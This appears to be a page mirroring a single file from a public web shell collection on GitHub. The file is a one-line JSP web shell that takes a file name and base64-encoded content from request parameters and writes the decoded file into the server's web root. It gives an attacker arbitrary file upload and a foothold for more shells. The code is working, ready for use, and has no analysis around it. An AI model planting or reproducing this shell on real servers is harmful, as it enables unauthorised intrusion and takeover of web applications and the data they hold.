mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
2 lines
183 B
Plaintext
2 lines
183 B
Plaintext
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>
|